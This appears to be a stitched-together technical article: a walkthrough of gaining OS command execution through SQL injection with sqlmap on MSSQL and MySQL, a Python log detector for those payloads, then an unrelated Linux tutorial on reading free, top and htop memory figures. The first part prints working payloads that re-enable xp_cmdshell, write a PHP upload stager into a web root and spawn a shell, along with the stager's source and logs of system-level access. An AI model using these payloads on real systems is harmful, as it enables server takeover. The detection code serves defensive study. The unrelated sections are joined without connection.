Mssql


To execute commands through MSSQL, the injection point must support stacked queries. Tested with MSSQL 2005.
xp_cmdshell is enabled by default in MSSQL 2000, but disabled by default in MSSQL 2005 and later. If the user has the sa administrator privilege, it can be turned back on with sp_configure.
Use sqlmap -v 3 to see sqlmap's payloads.

[16:13:05] [PAYLOAD] 1;DECLARE @hihq VARCHAR(8000);SET @hihq=0x70696e67202d6e203130203132372e302e302e31;EXEC master..xp_cmdshell @hihq--
0x70696e67202d6e203130203132372e302e302e31

Converted to a string this is ping -n 10 127.0.0.1
The response time is used to determine whether commands can be executed.

xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n]
[16:16:26] [PAYLOAD] 1;EXEC master..sp_configure 'SHOW advanced options',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'xp_cmdshell',1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'SHOW advanced options',0; RECONFIGURE WITH OVERRIDE--

xp_cmdshell is enabled via EXEC master..sp_configure 'xp_cmdshell',1; RECONFIGURE WITH OVERRIDE;

[16:19:59] [INFO] xp_cmdshell re-enabled successfully

Then a table is created to store the output of the executed command

[16:19:59] [PAYLOAD] 1;DROP TABLE sqlmapoutput--
[16:19:59] [PAYLOAD] 1;CREATE TABLE sqlmapoutput(id INT PRIMARY KEY IDENTITY, data NVARCHAR(4000))--
[16:19:59] [PAYLOAD] 1;DECLARE @iqoj VARCHAR(8000);SET @iqoj=0x6563686f2031;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @iqoj--
0x6563686f2031 is echo 1
[16:19:59] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(98)+CHAR(118)+CHAR(112)+CHAR(113)+ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(107)+CHAR(113) FROM sqlmapoutput ORDER BY id-- -
[16:19:59] [PAYLOAD] 1;DELETE FROM sqlmapoutput--

os-shell> whoami
[16:24:38] [PAYLOAD] 1;DECLARE @xgsv VARCHAR(8000);SET @xgsv=0x77686f616d69;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @xgsv--
[16:24:38] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(98)+CHAR(118)+CHAR(112)+CHAR(113)+ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(107)+CHAR(113) FROM sqlmapoutput ORDER BY id-- -
[16:24:38] [DEBUG] performed 1 queries in 0.04 seconds
[16:24:38] [PAYLOAD] 1;DELETE FROM sqlmapoutput--
command standard output: 'nt authority\system'

 

Mysql


python sqlmap.py -r r.txt --os-shell
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)

Press Enter to accept the default, PHP

what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search

Option 1 uses Apache's default web paths. The absolute path of the web application can be obtained from error messages, so choose 2 and enter it:
please provide a comma separate list of absolute directory paths: /var/www/html/
First, look at what sqlmap prints

[10:25:02] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[10:25:02] [WARNING] unable to upload the file stager on '/var/www/html/'
[10:25:02] [INFO] trying to upload the file stager on '/var/www/html/' via UNION method
[10:25:02] [INFO] the remote file '/var/www/html/tmpuhgbs.php' is larger (706 B) than the local file 'c:\users\dell\appdata\local\temp\sqlmappmmrsn14284\tmpdctwk9' (705B)
[10:25:02] [INFO] the file stager has been successfully uploaded on '/var/www/html/' - http://192.168.192.120:80/tmpuhgbs.php
[10:25:02] [INFO] the backdoor has been successfully uploaded on '/var/www/html/' - http://192.168.192.120:80/tmpbewox.php
[10:25:02] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

Now compare this against MySQL's query log:

[10:25:02] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[10:25:02] [WARNING] unable to upload the file stager on '/var/www/html/'

Writing the PHP file via the LINES TERMINATED BY method

SELECT first_name, last_name FROM users WHERE user_id = '' LIMIT 0,1 INTO OUTFILE '/var/www/html/tmpuscdb.php' LINES TERMINATED BY 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

LINES TERMINATED BY means each row of the result set is terminated by the content that follows BY. Here the query on user_id matches nothing, so no record is returned and the file ends up empty. If the id parameter is changed to 1, one row is returned, and this PHP file-upload program is written to the file successfully.

Then the file is written with the into outfile approach (here INTO DUMPFILE)

SELECT first_name, last_name FROM users WHERE user_id = '-1181' UNION ALL SELECT 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,NULL INTO DUMPFILE '/var/www/html/tmpuhgbs.php'-- -'

The hex content decodes to:

<?php
if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=/var/www/html/> <input type=submit name=upload value=upload></form>";}?>

This is a file-upload script.
Then sqlmap checks whether the file was written successfully

SELECT first_name, last_name FROM users WHERE user_id = '' UNION ALL SELECT CONCAT(0x71786a6b71,IFNULL(CAST(LENGTH(LOAD_FILE(0x2f7661722f7777772f68746d6c2f746d7075686762732e706870)) AS CHAR),0x20),0x7178767871),NULL-- -'

The file was uploaded successfully; note that the owner and group are both mysql.
-rw-rw-rw- 1 mysql mysql 706 6月 17 10:21 tmpuhgbs.php
Then a webshell is uploaded directly through tmpuhgbs.php; its owner is apache.
-rwxr-xr-x 1 apache apache 908 6月 17 10:21 tmpbewox.php
System commands can now be executed

os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output: 'apache'

PS: sometimes quitting midway causes command execution to return no output
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] No output
In that case, clear out C:\USERS\XXX\.SQLMAP\OUTPUT\
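From the defender's side, both the MSSQL and the MySQL walk-throughs above leave a very recognisable trail in database logs: hex-encoded VARCHAR literals handed to xp_cmdshell, sp_configure flipping 'xp_cmdshell' to 1, the sqlmapoutput scratch table, and INTO OUTFILE / INTO DUMPFILE / LOAD_FILE with hex-encoded paths. The following Python is an added example, not code from the original post or from sqlmap. It decodes 0x... literals and runs a few detection rules over constructed sample log lines modelled on the payloads shown above (the INTO DUMPFILE line is a constructed copy with the PHP payload replaced by the string "test"). The log-line format and rule names are assumptions; adapt them to whatever a SQL Server audit or the MySQL general query log actually emits in your environment.

```python
import re

# Constructed sample log lines, modelled on the sqlmap payloads in the post.
# Lines 0-2 mimic SQL Server statement auditing; 3-4 mimic the MySQL general
# query log; line 5 is a benign query and must not be flagged.
SAMPLE_LOG = [
    "1;DECLARE @hihq VARCHAR(8000);SET @hihq=0x70696e67202d6e203130203132372e302e302e31;EXEC master..xp_cmdshell @hihq--",
    "1;EXEC master..sp_configure 'SHOW advanced options',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'xp_cmdshell',1; RECONFIGURE WITH OVERRIDE--",
    "1;CREATE TABLE sqlmapoutput(id INT PRIMARY KEY IDENTITY, data NVARCHAR(4000))--",
    # constructed: same shape as the page's DUMPFILE payload, 0x74657374 == "test"
    "SELECT first_name, last_name FROM users WHERE user_id = '-1181' UNION ALL SELECT 0x74657374,NULL INTO DUMPFILE '/var/www/html/tmpuhgbs.php'-- -'",
    "SELECT first_name, last_name FROM users WHERE user_id = '' UNION ALL SELECT CONCAT(0x71786a6b71,IFNULL(CAST(LENGTH(LOAD_FILE(0x2f7661722f7777772f68746d6c2f746d7075686762732e706870)) AS CHAR),0x20),0x7178767871),NULL-- -'",
    "SELECT first_name, last_name FROM users WHERE user_id = '1' LIMIT 0,1",
]

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")

# Rule name -> pattern. Patterns are matched against the raw statement AND
# against the decoded hex literals, so a command or path hidden as 0x... is
# still visible to the rules.
RULES = [
    ("mssql_xp_cmdshell", re.compile(r"xp_cmdshell", re.I)),
    ("mssql_enable_xp_cmdshell", re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*1", re.I)),
    ("mssql_sqlmap_output_table", re.compile(r"\bsqlmapoutput\b", re.I)),
    ("mysql_into_outfile", re.compile(r"INTO\s+(OUTFILE|DUMPFILE)", re.I)),
    ("mysql_load_file", re.compile(r"LOAD_FILE\s*\(", re.I)),
    ("mysql_lines_terminated_by", re.compile(r"LINES\s+TERMINATED\s+BY", re.I)),
]


def decode_hex_literals(sql):
    """Return the printable ASCII strings hidden in 0x... literals of a statement."""
    found = []
    for m in HEX_LITERAL.finditer(sql):
        try:
            text = bytes.fromhex(m.group(1)).decode("ascii")
        except ValueError:  # odd-length hex or non-ASCII bytes: not a string literal
            continue
        if text.isprintable():
            found.append(text)
    return found


def analyze(line):
    """Return {'rules': [...], 'decoded': [...]} for a suspicious line, else None."""
    decoded = decode_hex_literals(line)
    haystack = line + " " + " ".join(decoded)
    hits = [name for name, rx in RULES if rx.search(haystack)]
    if not hits:
        return None
    return {"rules": hits, "decoded": decoded}


def scan(lines):
    """Run analyze() over a log; returns (line_index, result) for every hit."""
    results = []
    for i, line in enumerate(lines):
        r = analyze(line)
        if r is not None:
            results.append((i, r))
    return results


if __name__ == "__main__":
    for idx, r in scan(SAMPLE_LOG):
        print(f"line {idx}: rules={r['rules']} decoded={r['decoded']}")
```

On MSSQL the same rules can be complemented by a periodic check of `SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'`, since the whole MSSQL chain above depends on that value being 1; on MySQL the file-write steps depend on `secure_file_priv` being empty and on the mysql user being able to write into the web root, which is exactly what the `-rw-rw-rw- mysql mysql` listing above shows.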

0x01 Free


[root@template tmp]# free -m

             total       used       free     shared    buffers     cached

Mem:         15724        840      14883          0        213        214

-/+ buffers/cache:        412      15311

Swap:         4999          0       4999

First, a word about buffers and cache

buffers hold data waiting to be written out to disk (block devices); writes are batched once the buffer fills, which improves I/O performance (memory -> disk)

cached holds data read from disk; frequently used data is kept in memory to reduce I/O (disk -> memory)

 

Now the specific meaning of each value:

Mem

Mem: physical memory statistics

-/+ buffers/cached: physical memory statistics with the caches accounted for

Swap: usage of the swap partition on disk

 

Total physical memory: 15724M. Note that the free value in the first line is not the memory actually available. Let's look at what each value means

total1: total physical memory

used1: the total allocated for use as cache (including buffers and cache), though part of that cache may not actually be in use

free1: memory not yet allocated

shared1: shared memory

buffers1: buffers allocated by the system but not in use

cached1: cache allocated by the system but not in use

 

-/+buffers/cache

used2: the buffers and cache actually in use, which is also the total memory actually in use.

free2: unused buffers and cache plus unallocated memory; this is the memory actually available to the system right now.

 

Calculated as follows:

total1 = used1 + free1

total1 = used2 + free2

used1 = buffers1 + cached1 + used2

free2 = buffers1 + cached1 + free1
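The four identities above can be checked mechanically against real `free` output. The following Python is an added example, not part of the original post: it parses the old two-line `free -k` layout shown in this article into the total1/used1/... names used here, derives used2 and free2, and confirms they match the printed -/+ buffers/cache line. It also handles the newer procps-ng layout (3.3.10 and later), where buffers and cached are merged into a single buff/cache column, the -/+ line is gone, and an available column (the kernel's MemAvailable estimate) takes its place; the values in that second sample are constructed, not taken from the page.

```python
# Sample 1: constructed copy of the `free -k` output in this article
# (old procps layout with the "-/+ buffers/cache" line).
FREE_K_OLD = """\
             total       used       free     shared    buffers     cached
Mem:      16101816    1029264   15072552          0     220152     386804
-/+ buffers/cache:     422308   15679508
Swap:      5119992          0    5119992
"""

# Sample 2: constructed (assumed) values in the newer procps-ng layout.
# buff/cache = buffers + cached from sample 1; "available" is assumed here.
FREE_K_NEW = """\
              total        used        free      shared  buff/cache   available
Mem:       16101816     1029264    15072552           0      606956    15679508
Swap:       5119992           0     5119992
"""


def parse_free(text):
    """Parse `free` output (either layout) into the article's names.

    Returns a dict with total1/used1/free1/shared1, buffcache (= buffers1 +
    cached1), the derived used2/free2, and, where printed, the values free
    itself reported so they can be cross-checked. Units are whatever free used.
    """
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header = lines[0].split()
    mem = dict(zip(header, (int(x) for x in lines[1].split()[1:])))
    r = {"total1": mem["total"], "used1": mem["used"],
         "free1": mem["free"], "shared1": mem["shared"]}
    if "buffers" in mem and "cached" in mem:            # old layout
        r["buffers1"], r["cached1"] = mem["buffers"], mem["cached"]
        r["buffcache"] = mem["buffers"] + mem["cached"]
        for ln in lines:
            if ln.startswith("-/+"):                     # printed used2 / free2
                r["used2_printed"], r["free2_printed"] = (int(x) for x in ln.split()[-2:])
    else:                                                # new layout
        r["buffcache"] = mem["buff/cache"]
        r["available"] = mem["available"]
    r["used2"] = r["used1"] - r["buffcache"]             # used1 = buffers1 + cached1 + used2
    r["free2"] = r["free1"] + r["buffcache"]             # free2 = buffers1 + cached1 + free1
    return r


def check_identities(r):
    """True if the four identities from the article hold for a parsed sample."""
    return (r["total1"] == r["used1"] + r["free1"]
            and r["total1"] == r["used2"] + r["free2"]
            and r["used1"] == r["buffcache"] + r["used2"]
            and r["free2"] == r["buffcache"] + r["free1"])


def used_percent(r):
    """Real memory pressure: used2 as a percentage of total1, one decimal."""
    return round(100.0 * r["used2"] / r["total1"], 1)


if __name__ == "__main__":
    for sample in (FREE_K_OLD, FREE_K_NEW):
        r = parse_free(sample)
        print(f"used2={r['used2']} free2={r['free2']} ok={check_identities(r)} used={used_percent(r)}%")
```

On a modern kernel, prefer the available column (or MemAvailable in /proc/meminfo) over free2 when deciding whether a host is short of memory: free2 counts all page cache as reclaimable, while the kernel's estimate excludes cache that cannot be dropped cheaply.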

 

0x02 Top


[root@template tmp]# free -k        

             total       used       free     shared    buffers     cached

Mem:      16101816    1029264   15072552          0     220152     386804

-/+ buffers/cache:     422308   15679508

Swap:      5119992          0    5119992

[root@template tmp]#  top | head -n 5

top - 14:48:29 up 23:53,  3 users,  load average: 0.00, 0.01, 0.00

Tasks: 142 total,   1 running, 141 sleeping,   0 stopped,   0 zombie

Cpu(s):  0.2%us,  0.1%sy,  0.0%ni, 99.7%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st

Mem:  16101816k total,  1029388k used, 15072428k free,   220128k buffers

Swap:  5119992k total,        0k used,  5119992k free,   386800k cached

The values shown are almost identical to the first line of free's output, but top cannot give the -/+ buffers/cache data from free's second line. So top does not fully reflect actual physical memory usage; use free to see how much physical memory is really in use.

 

0x03 Htop


The memory usage it shows is the actual usage, matching used2.

[root@template tmp]# yum install htop

[root@template tmp]# free -m

             total       used       free     shared    buffers     cached

Mem:         15724       1005      14719          0        214        377

-/+ buffers/cache:        412      15312

Swap:         4999          0       4999